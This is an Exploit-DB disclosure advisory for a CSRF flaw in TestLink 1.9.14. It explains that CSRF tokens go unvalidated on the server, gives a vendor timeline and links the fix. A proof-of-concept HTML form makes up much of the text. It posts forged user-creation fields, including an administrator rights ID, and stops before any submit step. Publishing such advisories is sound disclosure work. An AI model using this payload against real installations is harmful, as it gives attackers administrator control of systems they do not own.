TestLink 1.9.14 - CSRF Vulnerability

ID EDB-ID:38661
Type exploitdb
Reporter Aravind C Ajayan, Balagopal N
Modified 2015-11-09T00:00:00


TestLink 1.9.14 - CSRF Vulnerability. Webapps exploit for php platform

Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed

Vulnerability Type:
Cross Site Request Forgery (CSRF)

CVE Reference:
Not assigned

Technical Details:
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.

Exploit Code

<html lang="en">
<title>CSRF Exploit to Create New Administrator Account</title>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />

Exploitation Technique:

Severity Level:

Advisory Timeline
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure

This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487

Credits & Authors
Aravind C Ajayan, Balagopal N